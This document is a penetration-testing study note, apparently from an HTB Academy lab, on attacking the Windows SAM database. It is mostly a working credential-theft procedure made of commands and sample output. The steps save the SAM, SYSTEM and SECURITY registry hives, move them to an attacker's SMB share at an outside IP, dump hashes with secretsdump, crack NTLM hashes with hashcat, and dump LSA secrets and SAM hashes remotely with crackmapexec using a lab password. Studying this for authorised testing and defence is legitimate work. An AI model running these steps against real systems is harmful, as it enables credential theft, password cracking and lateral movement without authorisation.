Attacking SAM (Security Account Manager)

When we gain local admin access to a non-domain joined Windows system, we can extract the SAM database and crack password hashes offline, avoiding the need to maintain an active session with the target.

---

Copying SAM Registry Hives

We need to extract the following registry hives:

Hive	Description
HKLM\SAM	Contains local account password hashes
HKLM\SYSTEM	Contains the system bootkey required to decrypt SAM
HKLM\SECURITY	Contains cached credentials (useful for domain-joined systems)

Using reg.exe Save Registry Hives (Run as Administrator):

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

---

Transferring the Hives to the Attack Host

🎯 Use smbserver.py from Impacket to share a directory on your attack box:

On attack Box

1. Start the SMB Server

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

On Target Machine

1. Move files from the Windows machine to your SMB share:

move sam.save \\10.10.15.16\CompData
move system.save \\10.10.15.16\CompData
move security.save \\10.10.15.16\CompData

📁 Confirm transfer:

ls
# Output:
sam.save  system.save  security.save

---

Dumping Hashes with secretsdump.py

• On attacker machine

• Once the SAM files has been transfered

🔧 Use Impacket’s secretsdump.py to extract NT hashes from the registry hives:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

🧾 Sample Output:

Administrator:500:<LMHASH>:<NTHASH>:::
bob:1001:aad3...:64f12cddaa88057e06a81b54e73b949b:::
...

ℹ️ Output format: user:RID:LM Hash:NT Hash:::

📌 NT Hashes are what you'll mostly target for cracking, especially on modern systems.

---

Cracking NT Hashes with Hashcat

📝 Create a file with NT hashes:

sudo vim hashestocrack.txt

# Example contents:
64f12cddaa88057e06a81b54e73b949b
6f8c3f4d3869a10f3b4f0522f537fd33
...

⚡ Crack them using Hashcat with NTLM hash mode -m 1000 and the RockYou wordlist:

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

✅ Sample Cracked Output:

f7eb9c06fafaa23c4bcf22ba6781c1e2:dragon
6f8c3f4d3869a10f3b4f0522f537fd33:iloveme
184ecdda8cf1dd238d438c4aea4d560d:adrian

💡 These passwords can now be tested across other systems—users commonly reuse them.

---

Remote Dumping with CrackMapExec

With local admin credentials, you can dump secrets remotely using CrackMapExec (CME).

Dump LSA Secrets Remotely:

crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

✅ Sample Output:

WS01\worker:Hello123
dpapi_machinekey:0xc03a...
dpapi_userkey:0x50b9...

---

Dump SAM Hashes Remotely:

crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

✅ Sample Output:

bob:1001:...:cf3a5525ee9414229e66279623ed5c58:::
sam:1002:...:a3ecf31e65208382e23b3420a34208fc:::
...

---

🧠 Key Takeaways

• 🧬 SAM & SYSTEM hives are crucial to decrypt and extract password hashes.

• 🔒 NTLM hashes (mode 1000) are the main targets for cracking.

• 🧰 Tools used:

  • secretsdump.py

  • hashcat

  • smbserver.py

  • crackmapexec

• 🔍 Cracked passwords may give access to other systems due to password reuse.

• 🔄 Always check for cached domain creds in HKLM\SECURITY if on a domain-joined target.